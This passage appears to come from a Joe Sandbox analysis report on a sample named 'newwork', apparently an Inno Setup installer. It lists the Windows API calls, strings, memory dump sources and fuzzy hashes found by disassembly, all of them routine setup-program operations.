                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                • String ID: LoadTypeLib$RegisterTypeLib
                                                                                • API String ID: 1312246647-2435364021
                                                                                • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                Strings
                                                                                • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                • API String ID: 3850602802-3720027226
                                                                                • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                APIs
                                                                                  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                • GetFocus.USER32 ref: 00478757
                                                                                • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FocusMessageStateTextWaitWindow
                                                                                • String ID: Wnd=$%x
                                                                                • API String ID: 1381870634-2927251529
                                                                                • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                APIs
                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$LocalSystem
                                                                                • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                • API String ID: 1748579591-1013271723
                                                                                • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesDeleteErrorLastMove
                                                                                • String ID: DeleteFile$MoveFile
                                                                                • API String ID: 3024442154-139070271
                                                                                • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                • API String ID: 47109696-2631785700
                                                                                • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                Strings
                                                                                • CSDVersion, xrefs: 00483BFC
                                                                                • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                • API String ID: 3677997916-1910633163
                                                                                • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                • API String ID: 1646373207-4063490227
                                                                                • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                • API String ID: 1646373207-260599015
                                                                                • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: NotifyWinEvent$user32.dll
                                                                                • API String ID: 1646373207-597752486
                                                                                • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                • API String ID: 1646373207-834958232
                                                                                • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                APIs
                                                                                  • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                • API String ID: 2238633743-2683653824
                                                                                • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID:
                                                                                • API String ID: 2066263336-0
                                                                                • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                APIs
                                                                                  • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                  • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CountErrorFileLastMoveTick
                                                                                • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                • API String ID: 2406187244-2685451598
                                                                                • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00413D46
                                                                                • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                  • Part of subcall function 00418EC0: 6FCFC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                  • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CursorDesktopWindow$Show
                                                                                • String ID:
                                                                                • API String ID: 2074268717-0
                                                                                • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
